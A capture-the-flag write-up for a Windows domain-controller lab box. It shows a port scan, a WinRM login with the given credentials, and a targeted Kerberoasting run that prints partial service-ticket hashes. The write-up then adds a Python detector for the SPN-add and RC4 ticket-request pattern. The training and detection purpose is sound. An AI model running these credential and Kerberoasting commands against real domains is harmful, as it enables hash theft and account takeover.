Machine Information

As is common in real-life Windows pentests, you will start the Administrator box with credentials for the following account:

Username: Olivia
Password: ichliebedich
```
# Nmap 7.95 scan initiated Wed Jan 15 19:05:28 2025 as: nmap -e utun4 -sC -sV -vv -oA nmap/default 10.10.11.42
Nmap scan report for 10.10.11.42
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2025-01-15 19:05:44 CST for 193s
Not shown: 986 closed tcp ports (reset)
PORT     STATE SERVICE       REASON          VERSION
21/tcp   open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-01-15 17:50:12Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
4444/tcp open  krb524?       syn-ack ttl 127
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-01-15T17:52:57
|_  start_date: N/A
|_clock-skew: 6h44m17s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 35406/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 46836/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 52617/udp): CLEAN (Timeout)
|   Check 4 (port 45074/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 15 19:08:57 2025 -- 1 IP address (1 host up) scanned in 208.89 seconds
```
crackmapexec
```
$ crackmapexec winrm administrator.htb -u Olivia -p ichliebedich
SMB         administrator.htb 5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP        administrator.htb 5985   DC               [*] http://administrator.htb:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       administrator.htb 5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)
```
A shell right from the start?
[screenshot: winrm2]
But this really is only the foothold account; it looks like we still need to get into another regular user before we can obtain the user flag.
targetedKerberoast
```
$ python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'Olivia' -p 'ichliebedich'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (michael)
[+] Printing hash for (michael)
$krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$a8bf671eddb8ecd101092866fe796ffe$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
[VERBOSE] SPN removed successfully for (michael)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$64e00f052e9895dedd10b92c02857d3b$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
```
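The verbose output above shows the footprint this technique leaves on the domain controller: an SPN is written onto a user object, an RC4 (`$krb5tgs$23$`) service ticket is requested for that account, and the SPN is removed again seconds later. From the blue-team side that sequence is a strong detection. The following is an added example, not part of the original writeup or the targetedKerberoast project: it correlates a `servicePrincipalName` write (Event ID 5136, which assumes "Audit Directory Service Changes" is enabled and a SACL exists on the user objects) with a subsequent Event ID 4769 whose ticket encryption type is RC4-HMAC (0x17) for the same account. The event records are constructed and simplified to the fields the logic needs; real Security log events carry more.

```python
"""Added example: detect the SPN-add -> RC4 TGS request -> SPN-delete pattern.

Event shapes below are constructed and simplified (not real Windows XML):
  5136: subject (who wrote), object (user whose attribute changed), attr, op
  4769: subject (who requested), service (account the ticket is for), etype
"""
from datetime import datetime, timedelta

RC4_HMAC = 0x17   # encryption type requested by classic kerberoasting
AES256 = 0x12

# Constructed sample events, loosely modelled on the run shown in the writeup.
EVENTS = [
    {"ts": "2025-01-15T17:52:10", "id": 5136, "subject": "Olivia",
     "object": "michael", "attr": "servicePrincipalName", "op": "add"},
    {"ts": "2025-01-15T17:52:11", "id": 4769, "subject": "Olivia",
     "service": "michael", "etype": RC4_HMAC},
    {"ts": "2025-01-15T17:52:12", "id": 5136, "subject": "Olivia",
     "object": "michael", "attr": "servicePrincipalName", "op": "delete"},
    # Benign: a real service account requested with AES, long-standing SPN.
    {"ts": "2025-01-15T17:55:00", "id": 4769, "subject": "svc_web",
     "service": "sqlsvc", "etype": AES256},
    # Benign: an admin adds an SPN and nobody requests a ticket for it.
    {"ts": "2025-01-15T18:10:00", "id": 5136, "subject": "Administrator",
     "object": "sqlsvc", "attr": "servicePrincipalName", "op": "add"},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def find_targeted_kerberoast(events, window=timedelta(minutes=5)):
    """Return one alert per servicePrincipalName add that is followed within
    `window` by an RC4 TGS request for the same account. A matching SPN delete
    inside the window is recorded as an extra (high-confidence) signal."""
    spn_adds = [e for e in events if e["id"] == 5136
                and e["attr"] == "servicePrincipalName" and e["op"] == "add"]
    spn_dels = [e for e in events if e["id"] == 5136
                and e["attr"] == "servicePrincipalName" and e["op"] == "delete"]
    tgs_reqs = [e for e in events if e["id"] == 4769]

    alerts = []
    for add in spn_adds:
        t0, t1 = _ts(add), _ts(add) + window
        acct = add["object"].lower()
        hits = sorted(
            (r for r in tgs_reqs
             if r["service"].lower() == acct and r["etype"] == RC4_HMAC
             and t0 <= _ts(r) <= t1),
            key=_ts,
        )
        if not hits:
            continue
        cleaned_up = any(d["object"].lower() == acct and t0 <= _ts(d) <= t1
                         for d in spn_dels)
        alerts.append({
            "account": add["object"],
            "spn_written_by": add["subject"],
            "ticket_requested_by": hits[0]["subject"],
            "first_request": hits[0]["ts"],
            "spn_removed_after": cleaned_up,
        })
    return alerts


if __name__ == "__main__":
    for a in find_targeted_kerberoast(EVENTS):
        print(a)
```

The two benign records show why the correlation matters: a lone SPN change is routine administration, and RC4 ticket requests alone still occur in many domains, but an SPN appearing on a user object and being roasted within seconds by the same principal that wrote it is not. The same logic can be pointed at a SIEM query instead of an in-memory list, and the window can be widened if the environment's audit pipeline adds delay.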